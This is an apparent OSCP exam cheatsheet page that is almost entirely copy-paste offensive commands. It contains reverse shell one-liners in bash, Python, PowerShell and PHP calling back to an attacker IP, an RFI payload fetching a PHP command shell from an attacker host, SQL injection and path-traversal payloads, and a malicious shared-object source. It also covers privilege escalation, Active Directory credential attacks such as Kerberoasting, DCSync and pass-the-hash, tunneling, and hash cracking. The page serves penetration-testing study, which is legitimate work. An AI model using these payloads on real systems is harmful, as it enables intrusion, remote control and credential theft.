Saltar a contenido

πŸ¦… The OSCP Mega-Cheatsheet

[!tip] Copy-Paste is King Si solo puedes abrir un archivo en el examen, que sea este. Presiona Ctrl+K para buscar cualquier comando.

🌎 1. Reconnaissance & Enumeration

πŸ” Nmap (The Holy Grail)

# Initial Fast Scan
sudo nmap -p- --open -sS --min-rate 5000 -n -Pn <IP> -oG allPorts

# Targeted Service Scan
sudo nmap -p<PORTS> -sCV -oN targeted <IP>

# FULL UDP Scan (Slow but necessary)
sudo nmap -p- -sU --min-rate 1000 <IP>

# Vuln Scan
nmap --script vuln -p <PORTS> <IP>

🌐 Web Fuzzing (Directory Busting)

Gobuster (Fastest) 

gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,cgi -t 50

FFUF (Best for Vhosts) 

# Directory Fuzzing
ffuf -u http://<IP>/FUZZ -w wordlist.txt -mc 200,301,302,403

# VHost Discovery
ffuf -u http://<DOMAIN> -H "Host: FUZZ.<DOMAIN>" -w subdomains.txt -fs <SIZE_OF_ROOT_PAGE>

πŸ“ SMB Enumeration

# List Shares (Null Session)
smbclient -L //<IP> -N

# Recursive Listing
smbmap -H <IP> -R

# Enumeration via CrackMapExec
crackmapexec smb <IP> --shares -u '' -p ''
crackmapexec smb <IP> --users

πŸ“§ SNMP Enumeration

snmpwalk -c public -v 2c <IP>
snmp-check <IP>

πŸ’» 2. Shells & Payloads

🐚 Upgrading Shell (Interactive TTY)

Method 1: Python (Classic) 

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice
export TERM=xterm

Method 2: Script (Old School) 

/usr/bin/script -qc /bin/bash /dev/null

🐍 Reverse Shells (One-Liners)

Bash 

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Python 

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PowerShell 

$client = New-Object System.Net.Sockets.TcpClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

PHP (Web Shell) 

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'"); ?>

πŸ“‘ 3. File Transfers

Method Linux (Attacker) Windows (Target)
HTTP (Python) python3 -m http.server 80 certutil -urlcache -f http://<IP>/file.exe file.exe
HTTP (Wget) - wget http://<IP>/file -O file
HTTP (PS) - iwr -uri http://<IP>/file.exe -o file.exe
SMB impacket-smbserver.py SHARE . -smb2support copy \\<IP>\SHARE\file.exe .
Netcat (Push) nc -w 3 <IP> 1234 < file nc -lvnp 1234 > file
Netcat (Pull) nc -lvnp 1234 < file nc <IP> 1234 > file

πŸ•ΈοΈ 4. Web Attacks

πŸ’‰ SQL Injection (Manual)

Authentication Bypass 

admin' or 1=1-- -
admin" or 1=1-- -
' or '1'='1

Union Based (Detect Columns) 

' ORDER BY 1-- -
' ORDER BY 2-- -  (Keep going until error)
' UNION SELECT 1,2,3,version()-- -

πŸ“‚ LFI (Local File Inclusion)

Linux Payloads 

../../../../etc/passwd%00
....//....//....//etc/passwd
php://filter/convert.base64-encode/resource=index.php

Windows Payloads 

../../../../boot.ini
../../../../windows/win.ini

🐚 RFI (Remote File Inclusion)

Requires allow_url_include = On. 

http://target.com/vuln.php?page=http://<ATTACKER_IP>/evil.txt
(evil.txt contains PHP code like <?php system($_GET['cmd']); ?>)

πŸ”‘ 5. Windows Privilege Escalation

πŸ“œ Reconnaissance

whoami /priv        # Check SeImpersonate, etc.
systeminfo          # Check OS Version & Hotfixes
net user <USER>     # Check group memberships
cmdkey /list        # Check stored credentials

πŸ› οΈ Service Misconfigurations

Unquoted Service Path 

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Weak Service Permissions (BinPath) 

accesschk.exe -uwcqv "Authenticated Users" *
# Exploit:
sc config <SERVICE> binpath= "net localgroup administrators <USER> /add"
sc stop <SERVICE>
sc start <SERVICE>

πŸ₯” Kernel Exploits

PrintSpoofer (If SeImpersonatePrivilege) 

PrintSpoofer.exe -i -c cmd

GodPotato (Newer Windows) 

GodPotato.exe -cmd "net localgroup administrators <USER> /add"

🐧 6. Linux Privilege Escalation

πŸ“œ Reconnaissance

sudo -l             # Check sudo rights
id                  # Check groups (lxd, docker, disk)
find / -perm -4000 2>/dev/null  # Check SUID binaries
cat /etc/crontab    # Check cron jobs

πŸ—‘οΈ Sudo Rights (GTFOBins)

If you can run vim as sudo: 

sudo vim -c ':!/bin/sh'

If you can run less / man / more as sudo: 

!/bin/sh

🧊 SUID Exploits

Systemctl SUID Create a service file that spawns a shell and link it.

Shared Object Injection If a SUID binary tries to load a missing .so file from a writable directory. 

// evil.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() { system("/bin/bash -p"); }
Compile: gcc -shared -o evil.so -fPIC evil.c

🏰 7. Active Directory (The Beast)

πŸ—ΊοΈ Enumeration (BloodHound)

BloodHound-Python (From Kali) 

bloodhound-python -u <USER> -p <PASS> -d <DOMAIN> -dc <DC_IP> -c All

SharpHound (From Windows) 

./SharpHound.exe -c All

πŸ”₯ Attacks

Kerberoasting (Service Accounts) Request TGS for services with SPNs. 

# Impacket
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -request -dc-ip <DC_IP> -outputfile hash

# Crack
hashcat -m 13100 hash rockyou.txt

ASREPRoasting (No Auth Required) Users with Do not require Kerberos preauthentication. 

# Impacket
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -format hashcat -outputfile hash

# Crack
hashcat -m 18200 hash rockyou.txt

DCSync (Domain Admin Rights) Dump all hashes from the Domain Controller. 

secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC_IP>

Pass-The-Hash Login without knowing the password, using the NTLM hash. 

evil-winrm -i <IP> -u <USER> -H <HASH>

πŸš‡ Pivoting & Tunneling

Chisel (Reverse SOCKS5) 1. Kali (Server): 

./chisel server -p 8000 --reverse
2. Target (Client): 
./chisel client <KALI_IP>:8000 R:socks
3. Kali (Proxychains): Edit /etc/proxychains4.conf -> socks5 127.0.0.1 1080

Ligolo-ng (Superior Tunneling) 1. Kali: 

sudo ip tuntap add user <USER> mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
2. Target: 
./agent -connect <KALI_IP>:11601 -ignore-cert
3. Kali (Interface): Select session session 1 -> start. Add route: sudo ip route add <INTERNAL_SUBNET>/24 dev ligolo

πŸ”¨ 8. Password Cracking

πŸ•΅οΈ John The Ripper

# General
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# Custom Rules (Best for mutations)
john --wordlist=words.txt --rules=best64 hash.txt

🐱 Hashcat Cheatsheet

ID Type Example
0 MD5 8743b52063cd84097a65d1633f5c74f5
1000 NTLM b4b9b02e6f09a9bd760f388b67351e2b
1800 sha512crypt $6$xyz... (Linux Shadow)
3200 bcrypt $2a$05$...
5600 NetNTLMv2 admin::DOMAIN:1122334455667788...
13100 Kerberos 5 TGS $krb5tgs$23$... (Kerberoasting)
18200 Kerberos 5 AS-REP $krb5asrep$23$... (ASREPRoasting)

Command: 

hashcat -m <ID> hash.txt rockyou.txt -O

πŸ“œ 9. Buffer Overflow (Brief)

  1. Fuzzing: Determine crash offset.
  2. Mona Config: !mona config -set workingfolder c:\mona\%p
  3. Find Offset:
    • Create pattern: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <LEN>
    • Crash app.
    • Find offset: !mona findmsp -distance <LEN>
  4. Bad Chars:
    • !mona bytearray -b "\x00"
    • Compare: !mona compare -f C:\mona\app\bytearray.bin -a <ESP_ADDRESS>
  5. Find JMP ESP:
    • !mona jmp -r esp -cpb "\x00\x0A..."
  6. Exploit:
    • Padding + EIP (JMP ESP Address) + NOPs (\x90 * 16) + Shellcode.

End of Mega-Cheatsheet